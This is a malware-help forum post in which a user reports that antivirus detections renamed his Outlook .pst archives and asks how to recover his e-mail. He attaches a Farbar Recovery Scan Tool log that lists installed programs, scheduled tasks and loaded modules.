
Log analysis and evaluation: TR/Crypt.Xpack.41536 in the Outlook .pst

Windows 7. If you have caught a Trojan or keep getting virus warnings, you can post the logs from our diagnostic tools here so that our experts can evaluate them. Before viruses and Trojans can be removed, the infected system must first be examined: First steps for help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.

15.01.2014, 10:27   #1
franz12
 

TR/Crypt.Xpack.41536 in the Outlook .pst



Hello!

During routine scans I noticed a few things. So I booted the PC from the current Avira Rescue CD and let it scan. The following viruses were detected and then renamed:

Outlook2003_mehr_gb pst -> TR/Crypt.Xpack.41536
archivoutlook2003_mehr_gb.pst -> WORM/Ntech.T
archiv1.pst -> TR/Crypt.ZPACK.Gen2
EXP.JAVA.Niabil.Gen

Unfortunately I don't know how to save the Avira Rescue CD log file. Photos of the screen are attached.

After that I created Addition.txt, FRST.txt, defogger_disable.log and Gmer.log.
And after that I ran a quick scan with Malwarebytes and chose "remove selection". Those logs are attached as well.

My questions are:
1) What should generally be done next?
2) How can I rescue the Outlook files that have now been renamed? All my e-mails are in there. Possibly it is not the file itself that is infected, but only an e-mail attachment inside it. I don't open such attachments anyway.

I am a sole proprietor.

Many thanks!
Franz

Addition.txt
Code:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-01-2014
Ran by ***** at 2014-01-15 08:47:18
Running from G:\Users\*****\Documents\***\***** Hacker\trojaner-board.de
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Microsoft Security Essentials (Enabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}

==================== Installed Programs ======================

 Update for Microsoft Office 2007 (KB2508958) (x32 Version:  - Microsoft)
3InternetManager (x32 Version: 3.0.0.141 - Hutchison 3G Austria GmbH)
Acer Arcade Deluxe (x32 Version: 3.2.7116 - CyberLink Corp.)
Acer Arcade Deluxe (x32 Version: 3.2.7116 - CyberLink Corp.) Hidden
Acer Backup Manager (x32 Version: 2.0.2.19 - NewTech Infosystems)
Acer eRecovery Management (x32 Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (x32 Version: 5.1.0.2 - Oberon Media, Inc.)
Acer Registration (x32 Version: 1.02.3006 - Acer Incorporated)
Acer ScreenSaver (x32 Version: 1.1.0812 - Acer Incorporated)
Acer Updater (x32 Version: 1.01.3017 - Acer Incorporated)
Acrobat.com (x32 Version: 1.6.65 - Adobe Systems Incorporated)
Acronis True Image Home (x32 Version: 11.0.8010 - Acronis)
Adobe Acrobat 7.0 Professional - English, Français, Deutsch (x32 Version: 7.1.0 - Adobe Systems) Hidden
Adobe AIR (x32 Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.3.9130 - Adobe Systems Inc.) Hidden
Adobe Bridge 1.0 (x32 Version: 001.000.004 - Adobe Systems)
Adobe Common File Installer (x32 Version: 1.00.001 - Adobe System Incorporated) Hidden
Adobe Creative Suite 2 (x32 Version:  - )
Adobe Flash Player 11 ActiveX (x32 Version: 11.9.900.117 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (x32 Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe GoLive CS2 (x32 Version: 8.0.1 - Ihr Firmenname) Hidden
Adobe Help Center 1.0 (x32 Version: 1.0.1 - Adobe Systems) Hidden
Adobe Illustrator CS2 (x32 Version: 12.000.000 - Adobe Systems Inc.) Hidden
Adobe InDesign CS2 (x32 Version: 004.000.000 - Adobe Systems Incorporated) Hidden
Adobe Photoshop 6.0 (x32 Version: 6.0 - Adobe Systems, Inc.)
Adobe Photoshop CS2 (x32 Version: 9.0 - Adobe Systems, Inc.) Hidden
Adobe Photoshop Elements 8.0 (x32 Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 8.0 (x32 Version: 8.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.05) - Deutsch (x32 Version: 11.0.05 - Adobe Systems Incorporated)
Adobe Stock Photos 1.0 (x32 Version: 1.0.1 - Adobe Systems) Hidden
Adobe SVG Viewer 3.0 (x32 Version:  3.0 - Adobe Systems, Inc.)
Adobe Version Cue CS2 (x32 Version: 2.0.1 - Adobe Systems, Inc.) Hidden
Advanced File Organizer (x32 Version: 2.61 - SoftPrime Development)
Advertising Center (x32 Version: 0.0.0.2 - Nero AG) Hidden
AIR iPad (x32 Version: 01 - UNKNOWN) Hidden
AIR iPad (x32 Version: v.01 - UNKNOWN)
Akeeba eXtract Wizard 3.3 (x32 Version:  - Akeeba Developers)
Alice Greenfingers (x32 Version:  - Oberon Media)
Amazon MP3-Downloader 1.0.17 (x32 Version: 1.0.17 - Amazon Services LLC)
Amazonia (x32 Version:  - Oberon Media)
Any Video Converter 3.5.2 (x32 Version:  - Any-Video-Converter.com)
Apple Application Support (x32 Version: 2.3.2 - Apple Inc.)
Apple Mobile Device Support (Version: 6.0.1.3 - Apple Inc.)
Apple Software Update (x32 Version: 2.1.3.127 - Apple Inc.)
Audacity 1.2.6 (x32 Version:  - )
Audacity 1.3.13 (Unicode) (x32 Version:  - Audacity Team)
Audible Download Manager (x32 Version: 6.6.0.15 - Audible, Inc.)
Avery Wizard 4.0 (x32 Version: 4.0.201 - Avery)
Backup Manager Advance (x32 Version: 2.0.2.19 - NewTech Infosystems) Hidden
Bonjour (Version: 3.0.0.10 - Apple Inc.)
Brother MFL-Pro Suite MFC-6490CW (x32 Version: 1.0.1.0 - Brother Industries, Ltd.)
Bulk Rename Utility 2.7.1.2 (Version:  - TGRMN Software)
Bullzip PDF Printer 10.1.0.1871 (Version: 10.1.0.1871 - Bullzip)
CamStudio (x32 Version:  - )
Chicken Invaders 2 (x32 Version:  - Oberon Media)
ColorChecker Passport 1.0 (x32 Version:  - X-Rite)
Compatibility Pack für 2007 Office System (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
CSS Tab Designer v2.0 (x32 Version:  - OverZone Software)
Dairy Dash (x32 Version:  - Oberon Media)
DivX-Setup (x32 Version: 2.6.1.9 - DivX, LLC)
Dream Day First Home (x32 Version:  - Oberon Media)
Dropbox (HKCU Version: 2.4.11 - Dropbox, Inc.)
eBay Worldwide (x32 Version: 2.1.0901 - OEM)
Engraver 2.0. (x32 Version:  - )
Engraver 2.22 (64 Bit). (Version:  - )
Engraver 2.22. (x32 Version:  - )
Epson Easy Photo Print 2 (x32 Version: 2.2.4.0 - SEIKO EPSON CORPORATION)
Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser) (x32 Version: 1.00.0000 - SEIKO EPSON CORPORATION)
Epson Print CD (x32 Version: 2.05.00 - SEIKO EPSON CORPORATION)
Epson Stylus Photo R3000 Handbuch (x32 Version:  - )
Epson Stylus Photo R3000 Netzwerk-Handbuch (x32 Version:  - )
Epson Stylus Photo R3000 Printer Uninstall (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (x32 Version: 2.4j - SEIKO EPSON CORPORATION)
EpsonNet Setup 3.3 (x32 Version: 3.3b - SEIKO EPSON CORPORATION)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.) Hidden
Farm Frenzy 2 (x32 Version:  - Oberon Media)
FileZilla Client 3.7.3 (x32 Version: 3.7.3 - Tim Kosse)
Firebird SQL Server - MAGIX Edition (x32 Version: 2.0.1.13 - MAGIX AG)
First Class Flurry (x32 Version:  - Oberon Media)
FlippingBook Publisher (x32 Version: 2.5.19 - FlippingBook) Hidden
FlippingBook Publisher Professional (x32 Version: 2.5.19 - FlippingBook)
Free CD to MP3 Converter (x32 Version:  - )
Free M4a to MP3 Converter 6.2 (x32 Version:  - ManiacTools.com)
Free YouTube to MP3 Converter version 3.11.20.423 (x32 Version: 3.11.20.423 - DVDVideoSoft Ltd.)
FRITZ!Fernzugang (Version: 1.2.3 - AVM Berlin)
Google Chrome (x32 Version: 31.0.1650.63 - Google Inc.)
Google Desktop (x32 Version: 5.9.1005.12335 - Google)
Google Earth Plug-in (x32 Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (x32 Version: 7.5.4805.320 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.3 - Google Inc.) Hidden
Granny In Paradise (x32 Version:  - Oberon Media)
gSyncit (x32 Version: 2.4.42 - Fieldston Software)
HappyFoto-Designer 4.4 (x32 Version:  - )
Hauppauge WinTV 7 (x32 Version: v7.0.30108 (CD 2.5c) - Hauppauge Computer Works)
Heroes of Hellas (x32 Version:  - Oberon Media)
HFSExplorer 0.21 (x32 Version: 0.21 - Catacombae Software)
Hotkey Utility (x32 Version: 2.05.3005 - Acer Incorporated)
HS3 2011 (x32 Version: 2011 (2011.04.002) - HS/3 Hotelsoftware GmbH & Co. KG)
Identity Card (x32 Version: 1.00.3002 - Acer Incorporated)
IETester v0.5.2 (remove only) (x32 Version: 0.5.2 - Core Services)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Inkscape 0.48.1  (x32 Version: 0.48.1 - )
Intel(R) Management Engine Components (x32 Version: 6.0.0.1179 - Intel Corporation)
Intel® Matrix Storage Manager (Version:  - Intel Corporation)
iTunes (Version: 11.0.1.12 - Apple Inc.)
Java 7 Update 45 (x32 Version: 7.0.450 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
JDownloader 0.9 (x32 Version: 0.9 - AppWork GmbH)
JMicron JMB36X Driver (x32 Version: 1.00.0000 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Kies (x32 Version: 1.4 - Ihr Firmenname)
Kies (x32 Version: 1.4 - Ihr Firmenname) Hidden
LAME v3.98.3 for Audacity (x32 Version:  - )
LinkChecker 8.4 (x32 Version:  - )
Macromedia Dreamweaver 8 (x32 Version: 8.0.0.2751 - Macromedia)
Macromedia Extension Manager (x32 Version: 1.7.270 - Ihr Firmenname)
Macromedia Fireworks 8 (x32 Version: 8.0.0.777 - Macromedia)
Macromedia Flash 8 (x32 Version: 8.00.0000 - Macromedia)
Macromedia Flash 8 Video Encoder (x32 Version: 1.00.0000 - Macromedia)
Macromedia FreeHand MXa (x32 Version: 11.0.1 - Macromedia)
MAGIX Screenshare 4.3.6.1987 (D) (x32 Version: 4.3.6.1987 - MAGIX AG)
MAGIX Video deluxe 15 8.0.0.62 (D) (x32 Version: 8.0.0.62 - MAGIX AG)
Merriam Websters Spell Jam (x32 Version:  - Oberon Media)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Antimalware Service DE-DE Language Pack (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (x32 Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Expression Design 4 (x32 Version: 7.0.20516.0 - Microsoft Corporation)
Microsoft Expression Design 4 (x32 Version: 7.0.20516.0 - Microsoft Corporation) Hidden
Microsoft Expression Encoder 4 (x32 Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Expression Encoder 4 (x32 Version: 4.0.1651.0 - Microsoft Corporation) Hidden
Microsoft Expression Encoder 4 Screen Capture Codec (x32 Version: 4.0.1651.0 - Microsoft Corporation)
Microsoft Expression Web 4 (x32 Version: 4.0.1303.0 - Microsoft Corporation)
Microsoft Expression Web 4 (x32 Version: 4.0.1303.0 - Microsoft Corporation) Hidden
Microsoft Expression Web 4 Service Pack 2 (x32 Version:  - Microsoft Corporation)
Microsoft LifeCam (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (x32 Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Language Pack 2007 - German/Deutsch (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (x32 Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office O MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (German) (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (German) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office SharePoint Designer 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office SharePoint Designer MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Standard 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Standard 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (x32 Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office X MUI (German) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office XP Professional (x32 Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.4.0304.0 - Microsoft Corporation) Hidden
Microsoft Security Client DE-DE Language Pack (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (Version: 4.4.304.0 - Microsoft Corporation)
Microsoft Silverlight (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (x32 Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (x32 Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (x32 Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022.218 (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (x32 Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411 (x32 Version: 9.0.30411 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (x32 Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (x32 Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (x32 Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 26.0 (x86 de) (x32 Version: 26.0 - Mozilla)
Mozilla Maintenance Service (x32 Version: 26.0 - Mozilla)
Mozilla Thunderbird (3.1.9) (x32 Version: 3.1.9 (de) - Mozilla)
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (x32 Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (x32 Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (x32 Version: 3.1.76.0 - Egis Technology Inc.)
Nero 9 Essentials (x32 Version:  - Nero AG)
Nero ControlCenter (x32 Version: 9.0.0.1 - Nero AG) Hidden
Nero DiscSpeed (x32 Version: 5.4.7.201 - Nero AG) Hidden
Nero DiscSpeed Help (x32 Version: 5.4.4.100 - Nero AG) Hidden
Nero DriveSpeed (x32 Version: 4.4.7.201 - Nero AG) Hidden
Nero DriveSpeed Help (x32 Version: 4.4.4.100 - Nero AG) Hidden
Nero Express Help (x32 Version: 9.4.9.100 - Nero AG) Hidden
Nero InfoTool (x32 Version: 6.4.7.201 - Nero AG) Hidden
Nero InfoTool Help (x32 Version: 6.4.4.100 - Nero AG) Hidden
Nero Installer (x32 Version: 4.4.8.1 - Nero AG) Hidden
Nero Online Upgrade (x32 Version: 1.3.0.0 - Nero AG) Hidden
Nero StartSmart (x32 Version: 9.4.11.209 - Nero AG) Hidden
Nero StartSmart Help (x32 Version: 9.4.11.208 - Nero AG) Hidden
Nero StartSmart OEM (x32 Version: 9.16.0.100 - Nero AG) Hidden
NeroExpress (x32 Version: 9.4.10.505 - Nero AG) Hidden
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
Notepad++ (x32 Version: 5.9 - )
NVIDIA 3D Vision Treiber 311.06 (Version: 311.06 - NVIDIA Corporation)
NVIDIA Display Control Panel (Version: 6.14.11.9703 - NVIDIA Corporation)
NVIDIA Drivers (Version: 1.10.57.35 - NVIDIA Corporation)
NVIDIA Grafiktreiber 311.06 (Version: 311.06 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.108.688 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.10.0129 - NVIDIA Corporation)
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.13.1106 - NVIDIA Corporation) Hidden
NVIDIA Systemsteuerung 311.06 (Version: 311.06 - NVIDIA Corporation) Hidden
NVIDIA Update 1.11.3 (Version: 1.11.3 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.11.3 - NVIDIA Corporation) Hidden
OpenOffice.org 3.4 (x32 Version: 3.4.9590 - OpenOffice.org)
Outlook Backup Assistant 5 (Testversion) (x32 Version: 5.0 - Priotecs IT GmbH)
Paragon Backup & Recovery™ 2012 Free (x32 Version: 90.00.0003 - Paragon Software)
PC Connectivity Solution (x32 Version: 8.47.7.0 - Nokia)
PDFCreator (x32 Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Phase 5 HTML-Editor (x32 Version: 5.6.2.3 - Systemberatung Schommer)
Picasa 3 (x32 Version: 3.8 - Google, Inc.)
Poedit (x32 Version: 1.5.5 - Vaclav Slavik)
Realtek High Definition Audio Driver (x32 Version: 6.0.1.5969 - Realtek Semiconductor Corp.)
Safari (x32 Version: 5.33.19.4 - Apple Inc.)
SAMSUNG USB Driver for Mobile Phones (Version: 1.3.350.0 - SAMSUNG Electronics Co., Ltd.)
Samsung_MonSetup (x32 Version: 1.00.0000 - Samsung)
Skype™ 5.0 (x32 Version: 5.0.156 - Skype Technologies S.A.)
SmartCopy (x32 Version:  - Northstar Systems Corp.)
SmartLauncher (x32 Version:  - Northstar Systems Corp.)
Stellarium 0.12.4 (Version: 0.12.4 - Stellarium team)
StuffIt Expander 2011 (Version: 15.0.1.17 - Smith Micro Software, Inc.)
Suite Specific (x32 Version: 2.0.0 - Adobe Systems, Incorporated) Hidden
SUPER © v2012.build.53 (Sep 13, 2012) Version v2012.build.53 (x32 Version: v2012.build.53 - eRightSoft)
TeamViewer 9 (x32 Version: 9.0.24951 - TeamViewer)
TeraCopy 2.2 (Version:  - Code Sector Inc.)
Textmosaic Generator 1.10 (x32 Version: 1.10 - Philipp Winterberg)
TextPad 4.7 (x32 Version: 4.7.2 - Ihr Firmenname)
Thumbnail Generator by Disable Spyware (x32 Version:  - )
TightVNC 2.0.2 (x32 Version: 2.0.2 - GlavSoft LLC.)
Total Commander 64-bit (Remove or Repair) (Version: 8.0 - Ghisler Software GmbH)
Total Immersion D'Fusion @Home Web Plug-In (x32 Version:  - Total Immersion)
TrueCrypt (x32 Version: 7.0a - TrueCrypt Foundation)
TuxGuitar (x32 Version: 1.2 - Herac)
Überwachungstool für die Intel® Turbo-Boost-Technologie (Version: 1.0.115.11 - Intel)
UltraVnc (x32 Version: 1.0.9.62 - uvnc bvba)
Unlocker 1.9.1-x64 (Version: 1.9.1 - Cedrick Collomb)
Update for 2007 Microsoft Office System (KB967642) (x32 Version:  - Microsoft)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3) (x32 Version: 3 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2836939) (x32 Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2836939v3) (x32 Version: 3 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (x32 Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2850085) 32-Bit Edition (x32 Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (x32 Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (x32 Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (x32 Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (x32 Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Vista Buttons (x32 Version:  - )
VLC media player 2.0.1 (x32 Version: 2.0.1 - VideoLAN)
Vuze (x32 Version: 4.7 - Vuze Inc.)
Web Album Generator 1.8.2 (x32 Version:  - ornj.net)
Welcome Center (x32 Version: 1.00.3008 - Acer Incorporated)
Windows Home Server-Connector (Version: 6.0.3436.0 - Microsoft Corporation)
Windows Live Anmelde-Assistent (x32 Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Call (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live Essentials (x32 Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Windows Live Fotogalerie (x32 Version: 14.0.8081.709 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 14.0.8091.0730 - Microsoft Corporation) Hidden
Windows Live Sync (x32 Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Writer (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live-Uploadtool (x32 Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Mobile-Gerätecenter (Version: 6.1.6965.0 - Microsoft Corporation)
Windows-Treiberpaket - Nokia pccsmcfd  (08/22/2008 7.0.0.0) (Version: 08/22/2008 7.0.0.0 - Nokia)
WinHTTrack Website Copier 3.46-1 (x32 Version: 3.46.1 - HTTrack)
WinRAR (Version:  - )
WinSCP 4.3.6 (x32 Version: 4.3.6 - Martin Prikryl)
Wisdom-soft AutoScreenRecorder 3.1 Pro (x32 Version:  - Wisdom Software Inc.)
Yahoo! Detect (x32 Version:  - )

==================== Restore Points  =========================

09-01-2014 05:51:11 Windows Update
12-01-2014 08:02:58 Windows Update

==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-05-21 18:45 - 00000894 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {0DDD88D8-CFC7-4470-8DC6-EE036AD134CA} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {321EE57E-85B7-4405-9AEC-8BD4BB6EEE13} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-12-11] (Google Inc.)
Task: {5A7AFC4B-76FA-4646-9E49-7B290CBEDD4D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-12-11] (Google Inc.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2010-01-02 15:42 - 2010-01-02 15:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2010-12-20 22:15 - 2010-03-15 11:28 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2010-07-15 05:44 - 2010-07-15 05:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2010-12-20 11:12 - 2009-06-21 09:52 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2010-12-20 11:12 - 2009-06-22 05:27 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll
2011-02-09 01:56 - 2011-02-09 01:56 - 00301568 _____ () C:\Program Files (x86)\Notepad++\NppShell_04.dll
2005-04-06 16:52 - 2005-04-06 16:52 - 00028791 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\hpi.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00057453 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\verify.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00102515 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\java.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00053364 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\zip.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00057455 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\net.dll
